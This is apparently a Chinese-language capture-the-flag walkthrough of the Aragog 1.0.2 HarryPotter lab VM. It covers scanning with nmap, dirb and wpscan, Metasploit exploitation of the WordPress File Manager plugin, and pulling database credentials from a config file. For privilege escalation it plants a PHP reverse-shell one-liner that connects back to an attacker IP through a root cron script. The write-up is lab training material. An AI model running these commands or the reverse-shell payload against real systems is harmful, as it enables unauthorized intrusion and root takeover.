Aragog 是 3 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。

信息收集

nmap扫描

nmap -sC -sV 192.168.210.148

IP地址靶机登录界面已经给出 根据扫描结果可得22ssh ,80http

网站信息收集

只有一张图片

爆破一下网站目录

dirb http://192.168.210.148

爆出来一个blog

页面有点奇怪,点击页面都会错误,推测需要域名解析,去/etc/hosts中写一下域名解析

哎,这就好了嘛

既然cms为wordpress那么必须得用wpscan跑一跑
直接扫没扫出什么有效信息,版本没有问题那可能插件有漏洞(noitce中提示),尝试wpscan注册账号,带上 api-token 跑一跑

注册wpscan一个账号 https://wpvulndb.com/users/sign_up

wpscan --api-token=免费版的就行 --url=http://192.168.210.148/blog -e p --plugins-detection aggressive

扫出3个问题,全是File Manager的漏洞

漏洞利用

msf getshell

msf检索漏洞exp

调试好参数

search wordpress File Manager
use 1
set rhosts wordpress.aragog.hogwarts
set targeturi /blog
set lhost 192.168.210.40
run

在/etc/wordpress/config-default.php 中发现了数据库的用户名密码

python调bash
python3 -c 'import pty; pty.spawn("/bin/bash");'

登录mysql数据库

查询数据库信息

得到用户hagrid98 PPPBYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
界面后可得 密码为password123

ssh登录

成功拿到第一个魂器

提权

在/opt下发现一个隐藏脚本,可以拷贝文件

在tmp下创建php反弹shell马

<?php $sock=fsockopen("192.168.210.40",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

?>

将脚本添加两行

kali建通端口,等待不超过1分钟
成功获得root权限

家目录下拿到第二个魂器

能弹shell的原因是root有一个计划任务

HarryPotter第一部—Aragog-1.0.2相关推荐

  1. htc g1 android4.0,都以为HTC G1是世界第一部安卓手机?其实不是!

    原标题:都以为HTC G1是世界第一部安卓手机?其实不是! G1由HTC制造,采用528MHz单核处理器.3.2英寸显示屏以及不带闪光灯的320万像素摄像头--听起来是不是非常寒碜?但6年前,它被公认 ...

  2. 亲手制作一个《哈利·波特》人物图谱,原来罗恩和赫敏的姻缘从第一部就已注定?...

    大数据文摘出品 作者:王烨 文摘菌记得小时候看<哈利·波特>小说的时候,最难记住的就是那些音译的名字,又长又多,最后只能关注那几个主要人物,跟着主要剧情一路过去,当个爽文看完了. 这就导致 ...

  3. 这15部评分9.0以上纪录片,让你放假后足不出户就可以看遍世界!(附链接)

    如果不出去走走, 你会以为眼前的就是全世界. 总是有那么一些人,他们充满了对世界的热爱和好奇,他们不远万里穿越世界每一个未知的角落,让我们坐在家里也能领略到世界的美丽!也激发着所有人对这个世界的认知和 ...

  4. 张飞实战电子第一部——门控开关设计笔记

    张飞实战电子第一部--门控开关设计 1. 项目开发步骤 1.1 项目背景 首先要明白使用的环境.条件.应用领域等.也就是说这个项目是一个什么公司提出来的,要做这么一个项目,这个项目有着一个这么样的使用 ...

  5. 《游戏编程》第一部 基础篇

    <游戏编程>第一部 基础篇 目录: 零.基础篇的目的 一.游戏的动画原理 二.基于动画原理的提高 三.游戏的基石: 窗口 的建立 四.游戏制作利器: 引擎 的选择 文章内容: 零.基础篇的 ...

  6. 张飞硬件设计与开发 学习笔记(第一部 线性稳压电源设计) 含理解,超详细!

    第一部 线性稳压电源的设计 前言 一.线性稳压电源的设计 1.课程概述.交流到直流降压简介 2.整流原理介绍.电阻选型.二极管介绍 3.电容的理解与选型 4.稳压电路的设计流程 5.元件详细选型 6. ...

  7. 【历史上的今天】9 月 7 日:世界上第一部电子电视;惠普联合创始人出生;上亿美国人隐私信息泄露

    整理 | 王启隆 透过「历史上的今天」,从过去看未来,从现在亦可以改变未来. 今天是 2022 年 9 月 7 日,在科技历史上,今天的许多风雨都藏在不言之中:惠普的联合创始人诞生,为硅谷神话奠基:第 ...

  8. Adobe Premiere 5.1教程(1)我的第一部电影

    Adobe Premiere 5.1教程(1)我的第一部电影   [02-4-2 15:17]   我们运行了Premiere5.1,出现如下的界面: 简单解释: * Monitor窗口是用来监看信号 ...

  9. mi 2s android7.1,抢鲜体验 第一部刷上安卓7.1的小米手机

    原标题:抢鲜体验 第一部刷上安卓7.1的小米手机 3月31日,小米宣布5C的MIUI 8开发版正式升级至安卓7.1内核.此前大家经常吐槽MIUI的安卓版本更新慢,而此次小米的速度让大家感到措手不及.那 ...

  10. python练习题(python之“求一个数的阶乘并求结果中从后向前数第一个不为0(零)的数” 等)

    实验环境:python2.7 题目1:python之"求一个数的阶乘并求结果中从后向前数第一个不为0(零)的数" 程序: import math def factorial(n): ...

最新文章

  1. 双系统 win10 时间不对
  2. python之cookies
  3. asp单元格合并后宽度没有合并_ElementUI Table组件如何使用合并行或列功能深入解析...
  4. win7系统丢失文件的处理方法
  5. Haproxy的安装与配置
  6. linux mod文件,mod文件扩展名,mod文件怎么打开?
  7. ext源码阅读 - DomHelper - createHtml,insertHtml
  8. MySQL练习题及答案(图书管理数据库)
  9. 黑苹果hd3000显存3m_加装黑苹果生产力翻倍,E3 神机规模升级再战五年
  10. js怎样判断图片链接是否有效
  11. DDD(五)——值对象
  12. 从阿里云下载centos的步骤
  13. protobuf repeated数组类型的使用
  14. java 电梯类图,电梯控制系统(用UML图理解)
  15. 基于人脑神经元与神经信息交流机制的类脑计算模型研究
  16. Win7 设置任务栏自动隐藏后,偶尔不能自动隐藏?
  17. oracle CLOB与BLOB的区别及使用
  18. 手机充电线接头处容易断裂怎么办?
  19. 问题 H: 口袋的天空(Kruscal)
  20. 百度开放云首席架构师徐串:架构师对架构的理解

热门文章

  1. DNT精英论坛(暨.NET北京俱乐部)第1期:见证.NET,风口上的成功案例!
  2. 各种语言如何连接到 OceanBase
  3. 《RRU-Net: The Ringed Residual U-Net for Image Splicing Forgery Detection》论文阅读
  4. Epicor 调试 customization
  5. go “静态目录服务” http.FileServer
  6. 【错误率、精度、查准率、查全率和F1度量】详细介绍
  7. Chrome免安装版制作
  8. import sys
  9. 论文复现——CE-FPN: Enhancing Channel Information for Object Detection
  10. android 应用引导用户去应用市场评论